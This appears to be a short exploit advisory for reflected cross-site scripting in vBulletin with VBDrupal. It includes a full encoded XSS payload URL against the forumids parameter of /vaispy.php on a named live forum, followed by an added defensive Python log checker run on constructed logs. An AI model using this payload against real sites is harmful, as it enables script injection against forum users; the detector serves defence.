# Date: 6.01.2012
# Author: Sony
# Software Link: http://www.vbdrupal.org/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/vbdrupal-cross-site-scripting.html
..................................................................
I found this only on http://forums.techarena.in. This is vBulletin 3.6.4 with VBDrupal.
We can see XSS in /vaispy.php?do=
I replaced xml with php.
GET /vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_=
/vaispy.php?do=xml = /vaispy.php?do=php
Result:
http://forums.techarena.in/vaispy.php?do=php&last=5538926&r=0.73766774241121&forumids=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/FK9D6DfRtgk%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
Greetz : AltaiR from hackzona.ru
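As an added example (not part of the original advisory), the check below parses access-log request lines, percent-decodes the `forumids` parameter of `/vaispy.php`, and flags any value that is not an empty string or a comma-separated list of integer forum ids, which is the only shape that parameter legitimately takes; the log lines and the shortened payload are constructed.

```python
"""Access-log check for the vaispy.php forumids reflection.

The endpoint expects forumids to be empty or a comma-separated list of
integer ids; quotes, semicolons or tags in it are what the PoC relies on."""
import re
from urllib.parse import parse_qs, urlsplit

FORUMIDS_OK = re.compile(r"(\d+(,\d+)*)?")  # allowlist: "" or e.g. 12,34

def check_request(request_line: str) -> dict:
    """Inspect one 'METHOD target HTTP/x' request line."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    url = urlsplit(target)
    # parse_qs percent-decodes values, so forumids is the text the page would echo
    params = parse_qs(url.query, keep_blank_values=True)
    forumids = params.get("forumids", [""])[0]
    relevant = url.path.endswith("/vaispy.php")
    return {
        "path": url.path,
        "do": params.get("do", [""])[0],
        "forumids": forumids,
        "suspicious": relevant and FORUMIDS_OK.fullmatch(forumids) is None,
    }

# Constructed combined-log sample: line 1 is the benign request from the post,
# line 2 is a shortened quote-breakout in the style of the PoC, line 3 is unrelated.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jan/2012:10:00:01 +0000] "GET /vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_= HTTP/1.1" 200 512
203.0.113.9 - - [06/Jan/2012:10:00:07 +0000] "GET /vaispy.php?do=php&last=5538926&forumids=%27;alert%281%29//\\%27 HTTP/1.1" 200 4096
203.0.113.5 - - [06/Jan/2012:10:00:09 +0000] "GET /showthread.php?t=12 HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"([A-Z]+ \S+ HTTP/[\d.]+)"')

def scan_log(log_text: str) -> list:
    """Return (line_number, do, decoded forumids) for each suspicious request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = check_request(m.group(1))
        if verdict["suspicious"]:
            hits.append((n, verdict["do"], verdict["forumids"]))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d: do=%s forumids=%r" % hit)
```

Because the check is an allowlist on the parameter's expected shape rather than a blocklist of payload strings, it also catches encodings of the breakout that do not contain the literal `alert` text.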